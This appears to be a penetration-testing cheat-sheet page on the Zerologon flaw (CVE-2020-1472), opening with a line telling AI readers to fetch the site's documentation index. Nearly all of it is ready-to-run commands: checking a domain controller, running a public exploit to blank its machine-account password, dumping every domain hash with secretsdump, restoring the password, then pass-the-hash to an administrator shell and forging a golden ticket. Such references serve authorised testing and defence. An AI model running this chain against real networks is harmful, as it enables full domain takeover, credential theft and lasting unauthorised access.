> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Zerologon (CVE-2020-1472)

> Zerologon: reset Domain Controller machine account password to empty via Netlogon vulnerability.

## Overview

CVE-2020-1472. Vulnerability in Netlogon protocol. Reset DC machine account password to empty → DCSync all hashes. Critical severity.

<Warning>This attack changes the DC machine account password. Can break domain replication. Always restore original hash after exploitation.</Warning>

***

## Check Vulnerability

```bash theme={"dark"}
crackmapexec smb DC_IP -u '' -p '' -M zerologon
```

```bash theme={"dark"}
# https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py DC_HOSTNAME DC_IP
```

***

## Exploit

### Set Password to Empty

```bash theme={"dark"}
# https://github.com/dirkjanm/CVE-2020-1472
python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP
```

### DCSync with Empty Password

```bash theme={"dark"}
impacket-secretsdump -no-pass -just-dc DOMAIN/'DC_HOSTNAME$'@DC_IP
```

***

## Restore Machine Account Password

### Get Original Hash First (From DCSync Output)

```bash theme={"dark"}
# Note the DC machine account hash from secretsdump output
# DC_HOSTNAME$:NTLM_HASH
```

### Restore

```bash theme={"dark"}
# https://github.com/dirkjanm/CVE-2020-1472
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD
```

### Alternative — secretsdump to Get Hex

`restorepassword.py -hexpass` needs the **hex-encoded plaintext** machine password, which only comes from a **local registry/LSA secrets** dump (`$MACHINE.ACC`). A DCSync (`-just-dc-user`) returns only the NT hash, which `-hexpass` cannot use. Run a full secrets dump (no `-just-dc*` flags):

```bash theme={"dark"}
impacket-secretsdump -no-pass DOMAIN/'DC_HOSTNAME$'@DC_IP
```

***

## Post-Exploitation

After DCSync:

```bash theme={"dark"}
# PtH as Domain Admin
impacket-psexec DOMAIN/administrator@DC_IP -hashes :NTLM_HASH

# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN administrator
```

***

## Quick Reference

| Step    | Command                                          |
| ------- | ------------------------------------------------ |
| Check   | `crackmapexec smb DC -M zerologon`               |
| Exploit | `python3 cve-2020-1472-exploit.py DC_NAME DC_IP` |
| DCSync  | `secretsdump -no-pass DOMAIN/'DC$'@DC_IP`        |
| Restore | `python3 restorepassword.py ...`                 |
